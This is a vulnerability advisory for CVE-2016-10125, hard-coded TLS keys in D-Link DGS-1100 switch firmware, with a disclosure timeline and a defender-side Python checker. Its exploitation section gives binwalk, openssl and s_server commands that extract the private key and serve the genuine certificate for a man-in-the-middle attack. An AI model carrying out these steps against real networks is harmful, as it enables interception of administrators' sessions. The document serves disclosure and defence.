CVE-2016-10125 - DLink DGS-1100 switch static hard-coded TLS crypto keys in firmware

1. Vulnerability Properties

Title: DLink DGS-1100 switch static hard-coded TLS cryptographic keys in firmware
CVE ID: CVE-2016-10125
CVSSv3 Base Score: 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)
Vendor: DLink (http://www.dlink.com)
Products: DGS-1100 Series Gigabit Smart Managed Switches, RevB (possibly others)
Advisory Release Date: 24 Aug 2016
Advisory URL: https://labs.integrity.pt/advisories/dlink-dgs-1100-hardcoded-keys
Credits: Discovery by Bruno Morisson <bm[at]integrity.pt>

2. Vulnerability Summary

The firmware for the DGS-1100 series 16- and 24-port switches (RevB) contains static, hard-coded cryptographic keys. These keys, together with the X.509 certificate, are used when HTTPS management is enabled on the switch.

An attacker can recover the private key from the publicly available firmware and use it to perform a Man-In-The-Middle attack against the switch administrator when they manage the switch through HTTPS.

Since these keys are hardcoded, they cannot be changed.

3. Technical Details

Exploiting the vulnerability

To exploit this vulnerability, the attacker only needs to download the firmware, and extract the private key and the certificate:

$ binwalk DGS1100-fw_1.01.018.flash 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
969166        0xEC9CE         Unix path: /../src/kernel/background.c
1238916       0x12E784        Certificate in DER format (x509 v3), header length: 4, sequence length: 685
1239608       0x12EA38        Private key in DER format (PKCS header length: 4, sequence length: 605

After extraction, check certificate:

$ openssl x509 -inform der -in 12E784.crt -noout -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 123 (0x7b)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: CN=Sample Matrix RSA-1024 Certificate Authority, C=US, ST=WA, L=Seattle, O=INSIDE Secure Corporation, OU=Test
        Validity
            Not Before: Jan  8 22:58:33 2013 GMT
            Not After : Jan  8 22:58:33 2016 GMT
        Subject: CN=Sample Matrix RSA-1024 Certificate, C=US, ST=WA, L=Seattle, O=INSIDE Secure Corporation, OU=Test
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:b6:53:c6:8e:1c:30:24:26:7d:c5:0c:96:9a:95:
                    95:7c:2e:4d:d3:0a:e2:1e:92:82:aa:07:30:ce:71:
                    c4:2b:d1:45:be:e0:f6:02:98:b1:ad:62:3b:6b:ac:
                    84:57:9d:c5:e8:b7:3f:c4:bc:b5:2f:48:2a:c8:c8:
                    84:15:2b:fb:62:30:bc:db:ba:0f:a9:2c:3d:d7:70:
                    bf:a0:af:86:5e:c6:c4:75:27:e3:7a:e2:7f:d4:da:
                    90:b6:a7:6c:a5:6e:e3:af:49:1b:4c:e4:5b:23:de:
                    fa:5d:8b:fc:d8:65:73:ce:ef:86:34:f4:fb:28:3a:
                    06:e1:ca:74:0c:02:dc:45:87
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: critical
                CA:FALSE
    Signature Algorithm: sha1WithRSAEncryption
        70:47:b9:b1:40:4a:3c:03:62:ae:1e:a6:44:74:f9:ea:6e:fd:
        da:7d:ef:36:42:49:90:13:f9:6f:cb:6f:dc:d7:9c:fa:56:90:
        89:9f:3b:87:d8:07:cb:3a:22:19:f6:6c:08:58:77:42:58:50:
        ac:f5:f9:ff:1c:df:ab:7c:a1:49:0b:18:5d:b9:47:a0:47:03:
        71:9a:9b:dd:d3:cc:8a:bc:b7:77:3c:f1:a9:ff:5f:56:92:4a:
        2d:84:9b:21:9e:44:30:5d:39:b9:38:a7:e1:b5:19:51:68:1f:
        a8:94:c2:22:d7:94:18:c1:55:78:ca:76:c2:da:7a:49:05:fd:
        51:0c

Confirm this is the exact same certificate shown by the browser.

Check the extracted key:

$  openssl rsa -noout -modulus -in 12EA38.key -inform der

Modulus=B653C68E1C3024.....

Run a webserver with this certificate and key:

$ openssl s_server -cert 12E784.crt -certform der -key 12EA38.key  -keyform der -accept 443 -HTTP -tls1

An attacker would now be able to perform a Man-In-The-Middle attack while presenting the genuine certificate, even if the administrator had saved this certificate as "trusted".
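As an added defender-side check (not part of the original advisory): a stand-alone Python script that tells an administrator whether a DER certificate (the one the switch presents, saved from the browser, or the file carved out with binwalk as above) or a whole firmware image carries the RSA modulus quoted in the openssl output above. The minimal DER walker and the constructed SubjectPublicKeyInfo sample are mine; only the modulus bytes come from the advisory.

```python
# Modulus from the advisory's `openssl x509 -text` output; the leading 00 that
# openssl prints is DER sign padding and is dropped here.
KNOWN_MODULUS = bytes.fromhex(
    "b653c68e1c3024267dc50c969a95957c2e4dd30ae21e9282aa0730ce71c42bd145bee0f60298b1ad623b6bac"
    "84579dc5e8b73fc4bcb52f482ac8c884152bfb6230bcdbba0fa92c3dd770bfa0af865ec6c47527e37ae27fd4da"
    "90b6a76ca56ee3af491b4ce45b23defa5d8bfcd86573ceef8634f4fb283a06e1ca740c02dc4587")

def der_tlv(tag, body):
    """Encode one DER TLV (long-form length for bodies of 128 bytes or more)."""
    if len(body) < 0x80:
        return bytes([tag, len(body)]) + body
    ln = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(ln)]) + ln + body

def der_integers(der):
    """Yield every INTEGER's content, descending into SEQUENCE/SET/[n] and into
    BIT STRING (SubjectPublicKeyInfo) / OCTET STRING (PKCS#8) wrappers."""
    i = 0
    while i + 2 <= len(der):
        tag, ln, i = der[i], der[i + 1], i + 2
        if ln & 0x80:                                    # long-form length
            n = ln & 0x7F
            ln, i = int.from_bytes(der[i:i + n], "big"), i + n
        body, i = der[i:i + ln], i + ln
        if tag == 0x02:
            yield body
        elif tag in (0x30, 0x31) or (tag & 0xE0) == 0xA0:
            yield from der_integers(body)
        elif tag in (0x03, 0x04):                        # BIT STRING starts with an unused-bits byte
            yield from der_integers(body[1:] if tag == 0x03 else body)

def rsa_modulus(der):
    """First INTEGER of at least 1024 bits (sign byte stripped), or None."""
    for value in der_integers(der):
        value = value[1:] if value[:1] == b"\x00" else value
        if len(value) >= 128:
            return value

def is_hardcoded_key(der):
    """True if a DER certificate or RSA key carries the advisory's modulus."""
    return rsa_modulus(der) == KNOWN_MODULUS

def firmware_contains_known_key(image):
    """Raw scan of a firmware image: 00 || modulus appears verbatim in both the embedded cert and key."""
    return (b"\x00" + KNOWN_MODULUS) in image

# Constructed sample: a SubjectPublicKeyInfo carrying the advisory's modulus, nested as a real certificate nests it.
SAMPLE_SPKI = der_tlv(0x30, der_tlv(0x30, bytes.fromhex("06092a864886f70d010101") + b"\x05\x00")  # rsaEncryption, NULL
    + der_tlv(0x03, b"\x00" + der_tlv(0x30, der_tlv(0x02, b"\x00" + KNOWN_MODULUS) + der_tlv(0x02, b"\x01\x00\x01"))))
```

Feed `is_hardcoded_key()` the bytes of a DER certificate or key and `firmware_contains_known_key()` the bytes of a whole flash image; a switch whose presented certificate still matches is running the affected key material regardless of the firmware version string.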

4. Vulnerable Versions

  • Firmware 1.01.018 for Rev.B of the DGS-1100, possibly others.

5. Solution

No solution available. See “6. Workarounds”.

6. Workarounds

Ensure that all access to the switch's management interface is performed only over a dedicated, directly connected cable.

7. Vulnerability Timeline

  • 29 March 2016 – Reported vulnerability to vendor;
  • 31 March 2016 – Provided additional information to vendor;
  • 27 May 2016 – Emailed vendor requesting feedback;
  • 6 June 2016 – Vendor replied;
  • 15 June 2016 – Emailed vendor saying available firmware is still the same vulnerable one;
  • 29 June 2016 – Vendor sent pre-release version. We replied that we no longer have access to a device to assess whether the vulnerability is corrected;
  • 27 June 2016 – Feedback requested on possible update;
  • 24 Aug 2016 – No feedback received. Version available still vulnerable. Advisory released.